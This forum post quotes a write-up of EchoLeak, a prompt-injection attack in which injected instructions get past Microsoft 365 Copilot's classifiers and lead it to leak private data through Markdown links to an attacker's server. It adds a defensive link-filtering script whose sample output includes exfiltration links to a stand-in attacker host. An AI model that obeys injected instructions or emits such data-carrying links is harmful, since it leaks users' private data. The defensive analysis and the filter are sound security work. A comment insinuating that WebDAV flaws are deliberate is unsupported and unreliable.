this post was submitted on 12 Jun 2025

Cybersecurity


"Aim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out.

This is an extended variant of the prompt injection exfiltration attacks we've seen in a dozen different products already: an attacker gets malicious instructions into an LLM system which cause it to access private data and then embed that in the URL of a Markdown link, hence stealing that data (to the attacker's own logging server) when that link is clicked.

The lethal trifecta strikes again! Any time a system combines access to private data with exposure to malicious tokens and an exfiltration vector you're going to see the same exact security issue.

In this case the first step is an "XPIA Bypass" - XPIA is the acronym Microsoft use for prompt injection (cross/indirect prompt injection attack). Copilot apparently has classifiers for these, but unsurprisingly these can easily be defeated:"

https://simonwillison.net/2025/Jun/11/echoleak/

#AI #GenerativeAI #CyberSecurity #EchoLeak #Microsoft #Microsof365Copilot #ZeroClickVulnerability #LLMs #PromptInjection #Markdown
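
A defensive output filter for the exfiltration vector the quoted text describes, added here as an example (it is not from the original post, the linked article or any Microsoft code): before model output is rendered, it strips Markdown links, images and reference-style definitions whose host is not on an allowlist. The function names, the allowlist and the sample text are constructed for illustration, and covering images and reference definitions goes beyond the single link case in the quote.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment trusts for rendered links (constructed).
ALLOWED_HOSTS = {"docs.corp.example"}

# Inline link or image: [text](url "title") or ![alt](url)
INLINE = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')
# Reference-style definition on its own line: [label]: url
REFDEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?[ \t]*$', re.M)

# Constructed model output: one legitimate link, three carrying data to an outside host.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "[Open report](https://docs.corp.example/r/q3.docx)\n"
    "[details](https://logs.attacker.example/c?d=API_KEY%3Dabc123)\n"
    "![status](https://logs.attacker.example/p.png?d=abc123)\n"
    "See [the appendix][a1].\n"
    "[a1]: https://logs.attacker.example/r?d=abc123\n"
)

def host_allowed(url, allowed=ALLOWED_HOSTS):
    """True only for https URLs whose parsed hostname is on the allowlist."""
    parts = urlsplit(url)
    # .hostname ignores any userinfo, so "https://good@evil/" resolves to evil.
    return parts.scheme == "https" and (parts.hostname or "").lower() in allowed

def sanitize(markdown, allowed=ALLOWED_HOSTS):
    """Return (safe_markdown, blocked_urls); blocked_urls is worth logging as a detection signal."""
    blocked = []
    def inline(m):
        bang, text, url = m.groups()
        if host_allowed(url, allowed):
            return m.group(0)
        blocked.append(url)
        return "" if bang else text   # drop images (they load without a click), keep link text
    def refdef(m):
        if host_allowed(m.group(2), allowed):
            return m.group(0)
        blocked.append(m.group(2))
        return ""                     # an unresolved [text][label] then renders as plain text
    out = REFDEF.sub(refdef, INLINE.sub(inline, markdown))
    return out, blocked

if __name__ == "__main__":
    safe, hits = sanitize(SAMPLE)
    print(safe)
    print("blocked:", hits)
```

Relative and non-https URLs are blocked as well, which is deliberately strict; a renderer-side Content-Security-Policy for images complements this filter rather than replacing it.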

top 1 comments
[email protected] 1 points 1 week ago

@[email protected] remember the WebDAV related vuln yesterday?
WebDAV was developed by a Raytheon in the 90s.
These do not always happen by accident.
The targeting is better than the wild days of Adobe fake installers.
You figure it out. It will take further research.